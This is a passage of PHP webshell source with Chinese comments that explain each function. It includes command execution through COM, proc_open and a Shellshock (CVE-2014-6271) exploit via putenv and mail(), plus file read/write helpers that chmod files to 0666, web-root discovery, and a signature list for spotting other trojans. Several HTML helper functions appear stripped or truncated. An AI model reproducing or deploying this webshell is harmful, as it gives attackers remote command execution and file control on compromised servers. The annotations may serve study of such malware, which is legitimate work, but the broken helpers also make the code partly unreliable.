exec($cmd);
$f = $e->StdOut();
$res = $f->ReadAll();
}
//
elseif (function_exists('proc_open')) {
$length = strcspn($cmd, " \t"); //返回 $cmd 中,所有字符都不存在于 ' \t' 范围的起始子字符串的长度
$token = substr($cmd, 0, $length); //截取$length长的$cmd作为$token
if (isset($aliases[$token])) {
$cmd = $aliases[$token] . substr($cmd, $length);
} //真正的cmd语句在这
//proc_open中,0 表示标准输入(stdin),1 表示标准输出(stdout),2 表示标准错误(stderr)
//这里用了1和2,比较完善
$p = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while (!feof($io[1])) {
//htmlspecialchars: 将特殊字符转换为 HTML 实体
//ENT_QUOTES: 会转换双引号,不转换单引号。
$res .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
}
while (!feof($io[2])) {
$res .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
//bash破壳漏洞(CVE-2014-6271)
elseif (function_exists('mail')) {
if (strstr(readlink("/bin/sh"), "bash") != false) {
$tmp = tempnam(".", "data");
putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
mail("a@127.0.0.1", "", "", "", "-bv");
} else {
$res = "Not vuln (not bash)";
}
//这里顺序有问题,下面这段应该放在上面那个if里
$output = @implode('', @file($tmp));
@unlink($tmp);
if ($output != "") {
$res = $output;
} else {
$res = "No output, or not vuln.";
}
}
return $res;
}
//webshell里图片的base64储存
function css_img($img)
{
$images = array(
"exe" =>
"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7" .
"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt" .
"xhIAOw==",
"dir" => "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE" .
"oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
"txt" =>
"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ" .
"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7" .
"UpPWG3Ig6Hq/XmRjuZwkAAA7",
"html" =>
"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz" .
"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P" .
"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk" .
"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR" .
"ADs=",
"js" =>
"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH" .
"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs" .
"a00AjYYBbc/o9HjNniUAADs=",
"xml" =>
"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA" .
"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx" .
"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ" .
"IQA7",
"mp3" =>
"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU" .
"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc" .
"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
"img" =>
"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci" .
"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd" .
"FxEAOw==",
"title" => "R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+" .
"mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL" .
"I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
"rar" => "R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/" .
"/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b" .
"OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC" .
"aNOmRcjVj02tPxPCzfkvIAA7"
);
header('Content-type: image/gif');
echo base64_decode($images[$img]);
die();
}
//取文件后缀,返回文件类型
function css_showimg($file)
{
$it = substr($file, -3);
switch ($it) {
case "jpg":
case "gif":
case "bmp":
case "png":
case "ico":
return 'img';
break;
case "htm":
case "tml":
return 'html';
break;
case "exe":
case "com":
return 'exe';
break;
case "xml":
case "doc":
return 'xml';
break;
case ".js":
case "vbs":
return 'js';
break;
case "mp3":
case "wma":
case "wav":
case "swf":
case ".rm":
case "avi":
case "mp4":
case "mvb":
return 'mp3';
break;
case "rar":
case "tar":
case ".gz":
case "zip":
case "iso":
return 'rar';
break;
default:
return 'txt';
break;
}
}
//打印html到页面上
function html_n($data)
{
echo "$data\n";
}
//木马?Unknown
function muma($filecode, $filetype)
{
$dim = array(
"php" => array("eval(", "exec("),
"asp" => array("WScript.Shell", "execute(", "createtextfile("),
"aspx" => array("Response.Write(eval(", "RunCMD(", "CreateText()"),
"jsp" => array("runtime.exec(")
);
foreach ($dim[$filetype] as $code) {
if (stristr($filecode, $code)) {
return true;
}
}
}
//判断文件后缀
function debug($file, $ftype)
{
$type = explode('|', $ftype);
foreach ($type as $i) {
if (stristr($file, $i)) {
return true;
}
}
}
//替换路径中的 // 为 /
function str_path($path)
{
return str_replace('//', '/', $path);
}
//弹窗
function msg($msg)
{
die("");
}
//返回路径中的目录部分,替换\\为/,并进行url编码
function uppath($nowpath)
{
$nowpath = str_replace('\\', '/', dirname($nowpath));
return urlencode($nowpath);
}
//输出带有target的a
function html_ta($url, $name)
{
html_n("$name");
}
//html的a
function html_a($url, $name, $where = '')
{
html_n("$name ");
}
//显示指定的url图片
function html_img($url)
{
html_n("
");
}
//返回
function back()
{
html_n("");
}
//html的radio
function html_radio($namei, $namet, $v1, $v2)
{
html_n('' . $namei);
html_n('' . $namet . '
');
}
//html的input
function html_input($type, $name, $value = '', $text = '', $size = '', $mode = false)
{
if ($mode) {
html_n("$text");
} else {
html_n("$text ");
}
}
//html的textarea
function html_text($name, $cols, $rows, $value = '')
{
html_n("
");
}
//html的select
function html_select($array, $mode = '', $change = '', $name = 'class')
{
html_n("");
}
//html的font
function html_font($color, $size, $name)
{
html_n("$name");
}
//替换\\为/,替换//为/
function File_Str($string)
{
return str_replace('//', '/', str_replace('\\', '/', $string));
}
//文件写入
function File_Write($filename, $filecode, $filemode)
{
$key = true;
$handle = @fopen($filename, $filemode);
if (!@fwrite($handle, $filecode)) {
@chmod($filename, 0666);
$key = @fwrite($handle, $filecode) ? true : false;
}
@fclose($handle);
return $key;
}
//返回www根目录
function File_Mode()
{
$RealPath = realpath('./');
$SelfPath = $_SERVER['PHP_SELF'];
$SelfPath = substr($SelfPath, 0, strrpos($SelfPath, '/'));
return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}
//文件所属用户
function GetFileOwner($File)
{
if (PATH_SEPARATOR == ':') {
if (function_exists('posix_getpwuid')) {
$File = posix_getpwuid(fileowner($File));
}
return $File['name'];
}
}
//文件所属组
function GetFileGroup($File)
{
if (PATH_SEPARATOR == ':') {
if (function_exists('posix_getgrgid')) {
$File = posix_getgrgid(filegroup($File));
}
return $File['name'];
}
}
//文件大小数字处理
function File_Size($size)
{
$kb = 1024;
$mb = 1024 * $kb;
$gb = 1024 * $mb;
$tb = 1024 * $gb;
$db = 1024 * $tb;
if ($size < $kb) {
return $size . " B";
} elseif ($size < $mb) {
return round($size / $kb, 2) . " K";
} elseif ($size < $gb) {
return round($size / $mb, 2) . " M";
} elseif ($size < $tb) {
return round($size / $gb, 2) . " G";
} elseif ($size < $db) {
return round($size / $tb, 2) . " T";
} else {
return round($size / $db, 2) . " ST";
}
}
//读取文件
function File_Read($filename)
{
$handle = @fopen($filename, "rb");
$filecode = @fread($handle, @filesize($filename));
@fclose($handle);
return $filecode;
}
//数组编码转换
function array_iconv($data, $output = 'utf-8')
{
$encode_arr = array('UTF-8', 'ASCII', 'GBK', 'utf8', 'BIG5', 'JIS', 'eucjp-win', 'sjis-win', 'EUC-JP');
$encoded = mb_detect_encoding($data, $encode_arr);
if (!is_array($data)) {
return mb_convert_encoding($data, $output, $encoded);
} else {
foreach ($data as $key => $val) {
$key = array_iconv($key, $output);
if (is_array($val)) {
$data[$key] = array_iconv($val, $output);
} else {
$data[$key] = mb_convert_encoding($data, $output, $encoded);
}
}
return $data;
}
}
//Unknown
function Mysql_Len($data, $len)
{
if (strlen($data) < $len) {
return $data;
}
return substr_replace($data, '...', $len);
}
//一些js,最后那些php unknown
function css_js($num, $code = '')
{
html_n('");
}
//左侧CSS
function css_left()
{
$str = <<
.menu{width:152px;margin-left:auto;margin-right:auto;}
.menu dl{margin-top:2px;}
.menu dl dt{top left repeat-x;}
.menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold;
text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}
.menu dl dt a:hover{color:#FFFFCC;}
.menu dl dd ul{list-style:none;}
.menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px;
background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF;
border-style:solid;border-width:1px;}
.menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;}
end;
html_n($str);
$str = <<
function getObject(objectId){
if(document.getElementById && document.getElementById(objectId)) {
return document.getElementById(objectId);
}
else if (document.all && document.all(objectId)) {
return document.all(objectId);
}
else if (document.layers && document.layers[objectId]) {
return document.layers[objectId];
}
else {
return false;
}
}
function showHide(objname){
var obj = getObject(objname);
if(obj.style.display == "none"){
obj.style.display = "block";
}else{
obj.style.display = "none";
}
}